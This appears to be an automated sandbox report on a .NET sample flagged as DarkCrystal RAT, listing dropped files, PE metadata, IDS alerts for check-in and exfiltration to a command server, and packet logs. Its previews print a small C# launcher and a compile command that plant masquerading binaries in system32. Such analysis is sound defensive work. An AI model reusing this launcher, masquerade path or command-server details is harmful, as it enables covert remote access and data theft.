                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1373607036346451
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                                          MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                                          SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                                          SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                                          SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                          Category:dropped
                                                                                          Size (bytes):381
                                                                                          Entropy (8bit):4.886230414160619
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L2hIDUDhiFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLkb
                                                                                          MD5:B6AE7461825B88E7AA9E2149F2687676
                                                                                          SHA1:46324B23A33A6551D3C0D48CABF489B2ED3D2F77
                                                                                          SHA-256:DCBCB31661B9D4AA33FCE15141587E59FD6CE14EFDCFE38F1D91A6F36613B8D9
                                                                                          SHA-512:C72F6352B658703AEDFE6E14288E89A7960ACC037845F561D313B405230D17A5815DB5B40BD1BE2E1E4077DAF18202DA622C713DB35E54C34FBCB2D5A683249E
                                                                                          Malicious:false
                                                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\All Users\fontdrvhost.exe"); } catch { } }).Start();. }.}.
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):251
                                                                                          Entropy (8bit):5.133056207295608
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8oCHhJ23fUm:Hu7L//TRq79cQDj
                                                                                          MD5:F0D8CB6AEF0C8AA08F3DC3786F95F660
                                                                                          SHA1:8069150020971E6AD3C33108686843E4828841CF
                                                                                          SHA-256:D994EA085EE63E21D7D80195AE79DA5753636FBFA5370A1F553092C7864F9B38
                                                                                          SHA-512:BA46781B088288EFB15AD95E9136F0A69A75D90E72AB12F84E4303BAE34FBA391C678443ECF14584F1748A7D83503767CDE232529E4A2C8C5E1B993E18914581
                                                                                          Malicious:false
                                                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.0.cs"
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (331), with CRLF, CR line terminators
                                                                                          Category:modified
                                                                                          Size (bytes):752
                                                                                          Entropy (8bit):5.265990422832311
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:K8/I/u7L//TRq79cQDCKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KOI/un/Vq79tDCKax5DqBVKVrdFAMBJj
                                                                                          MD5:36EC48D8A867BB4E9D0B47FD9DC5DAC8
                                                                                          SHA1:175E054936CD0D9A3FCCFD20C96B47B1A678F774
                                                                                          SHA-256:F64ED2CBF93E681F03F743B4FF9115872628D9D73976AF5C928843191E939B3B
                                                                                          SHA-512:80B87EF4027352A7FB5F65E8B8B9EDC456800B059D1D62C58C3C81FFA92FEC282CFEA7EE02CA6B34D300378DAB90EEA03449B663A2A11D448FB8B0D0568A2E9C
                                                                                          Malicious:false
                                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\zrf14fw5\zrf14fw5.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):209
                                                                                          Entropy (8bit):5.642719904569892
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:4J72WdyOjSsO/Xem/f3JdZ0Yg0qze/4Ic7:G8Ou//bZ0YEz1
                                                                                          MD5:8A14699E210F8A3D9226A4BBD2E71DC0
                                                                                          SHA1:D71FD89482B65E22BCAA5F5EDA65C641D9354DBF
                                                                                          SHA-256:3B2F44E74A90C30A5350E4AD023D9C2188BD4E38927679AA9A3DFB6C9131DB38
                                                                                          SHA-512:D923F30B83E711BCFCF58FED8B5769F8DBD3B8B8637842F998B1E7335D53BABCF73C223BDFEC4A1A32FA740F77109CFF1DE47B53B205856DFB634C924CD07616
                                                                                          Malicious:false
                                                                                          Preview:dH0iFWbv7Fbb3yVGeZ3gnDz8W4BvTRPCBL2vkWVLnIYcbiojm2R3O8iaS2MKVqcpzZZr6jgIEs2fpXgyQcIbAWyCmbdrKK07psmCI6mCWIyfFDv4WY42hBodkWEeFy8425z6udpTzFE2hS6jqiVwP7ZoDJcv1I6iJ4nKOyK2slCb6w5RZfyhcMo4gK2lB3brIgsmpwV1YdDo47rRN
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):903680
                                                                                          Entropy (8bit):5.346245125656977
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:Sey1d7N520G7/XsQcJ4/VADlK3Yogh4DrJgDmkAkZeR+HjYIAWCKCwxuEPY4rPva:SJZMjsNoVrWXuehAVfmG66t
                                                                                          MD5:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          SHA1:A5D1E71B9E6484A5EBC555DD41A5450909387CB2
                                                                                          SHA-256:EB3FF36D945D22D68D24690566115EAC07C6666154EC18DD37527673375E41FA
                                                                                          SHA-512:807A3A8C5A223F843989FF1488198C7700A0E1AD779B7E055CE93AD44FEF24C62A4025325621EE7B402CB771584EC847E9CB63177BEE8672B31B3C7F6F5B5DB3
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:JSON data
                                                                                          Category:dropped
                                                                                          Size (bytes):55
                                                                                          Entropy (8bit):4.306461250274409
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                          Malicious:false
                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                          File Type:MSVC .res
                                                                                          Category:dropped
                                                                                          Size (bytes):1224
                                                                                          Entropy (8bit):4.435108676655666
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                          MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                          SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                          SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                          SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                          Malicious:false
                                                                                          Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):4608
                                                                                          Entropy (8bit):3.930247979992911
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:6yJ7PtcjM7Jt8Bs3FJsdcV4MKe27aMvqBHeOulajfqXSfbNtm:VPlPc+Vx9MaMvk4cjRzNt
                                                                                          MD5:361C4179D66C34AD3BDCB8D19A88B9D0
                                                                                          SHA1:1089D901EB8C9836169C63E0E37C943EEE78DC2F
                                                                                          SHA-256:7A24BFB143B9E118D70EA569804F442B2F1A9F61EA32F073EF99207D6B1CF0FC
                                                                                          SHA-512:BCBA0B0D41D34F05303FEBD1315F23C0CED47786F7B50C2B4A208D3BEB56FF57E1D200B7C1A2F5100EF2A87D3902394F190FA27610FB06491EA3EFDB9797728B
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Process:C:\Windows\System32\PING.EXE
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):502
                                                                                          Entropy (8bit):4.630609828667227
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:PpA5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:xidUOAokItULVDv
                                                                                          MD5:8BC8C3E24D760305B8D4601B4D3789EA
                                                                                          SHA1:049911B2CA689F1063943675E26791264C73B0BC
                                                                                          SHA-256:CC070075EE88AB8A30FE7D1B5174E2274C7F0041BEB8A013940FCB53801D6275
                                                                                          SHA-512:8C4D5146BEE934D113DBDD67A5B1D8A377AB8DB5B10CD990A8DB537EC000562929395654570035978605F2E170550B75EDABDFD637DE3ACE4AF47FD212B559F5
                                                                                          Malicious:false
                                                                                          Preview:..Pinging 585948 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):5.946392176570888
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                          File name:Wh2c6sgwRo.exe
                                                                                          File size:400'384 bytes
                                                                                          MD5:43d30c776f593efdf5416ab4142442d6
                                                                                          SHA1:3f7f251511aa918a3c221cb4d039e406e9449132
                                                                                          SHA256:aafd35488559a2ef64b3758eff767046369f540af491f9325d344c2ef214587a
                                                                                          SHA512:8b1b195775c3de13cc281fe9d92580230fcdb48a9dab001eaa442328aa88e1ec27ced4cdaaa941bb42141a269e7f844f4dd945d8a9a6df06bb05393271987238
                                                                                          SSDEEP:6144:sSg0P0VgwhTfR4NATIVDHPfq1NRHR5/nQibDVDeFtJ9JDwzTE3GL0:+hLR4vq1N354iHQj1X3G
                                                                                          TLSH:3A84F71BFA428D51C2985B33D5DF440863B4DA8176ABDE0E38CA23E5494337BED8E587
                                                                                          Icon Hash:00928e8e8686b000
                                                                                          Entrypoint:0x46311e
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x8FECC87F [Sun Jul 8 10:48:31 2046 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
                                                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x630d0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0x590 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x66000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x61124 | 0x61200 | ca3d5f88fb5edc56ca7216682de8f8b3 | False | 0.4600526866151866 | data | 5.956544366964587 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x64000 | 0x590 | 0x600 | 82c39eea34ce07077166e5c598e90129 | False | 0.4166666666666667 | data | 4.025634807679199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x66000 | 0xc | 0x200 | c3149318ea17c45d745f87ab0c391d0a | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x640a0 | 0x304 | data |  |  | 0.4339378238341969
RT_MANIFEST | 0x643a4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators |  |  | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-10T07:28:13.983208+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.8 | 49713 | 147.45.47.151 | 80 | TCP
2024-12-10T07:28:31.389464+0100 | 2048130 | ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) | 1 | 192.168.2.8 | 49728 | 147.45.47.151 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                          Dec 10, 2024 07:27:47.731318951 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.731323004 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.731379986 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.731390953 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.731430054 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.731519938 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.731569052 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.731678009 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.731729984 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.848972082 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.849046946 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.849062920 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.849118948 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.849139929 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.849167109 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.849246025 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.849306107 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.849380970 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.849432945 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.849518061 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.849567890 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.849643946 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.849704981 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.849744081 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.849803925 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.849888086 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.849940062 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.850028992 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850081921 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.850156069 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850207090 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.850258112 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850313902 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.850394964 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850456953 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.850501060 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850572109 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.850647926 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850694895 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.850703955 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850760937 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.850788116 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850866079 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.850903034 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850913048 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850925922 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850965023 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.850975990 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.850986958 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851047993 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851057053 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851067066 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851109028 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851144075 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851155043 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851210117 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851294041 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851304054 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851320982 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851330042 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851346016 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851370096 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851380110 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851392031 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851435900 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851458073 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851468086 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851497889 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851505995 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851528883 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851540089 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851563931 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851577044 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851620913 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851632118 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851670980 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851696968 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851710081 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851744890 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851761103 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851788998 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851798058 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851810932 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851871967 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.851897001 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851908922 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851914883 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.851985931 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852046013 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852056026 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852063894 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852082968 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852093935 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852127075 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852133989 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852154970 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852179050 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852190018 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852206945 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852247000 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852327108 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852338076 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852370024 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852381945 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852390051 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852440119 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852463961 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852509975 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852520943 CET555549705147.45.44.151192.168.2.8
                                                                                          Dec 10, 2024 07:27:47.852555990 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852569103 CET497055555192.168.2.8147.45.44.151
                                                                                          Dec 10, 2024 07:27:47.852576971 CET555549705147.45.44.151192.168.2.8
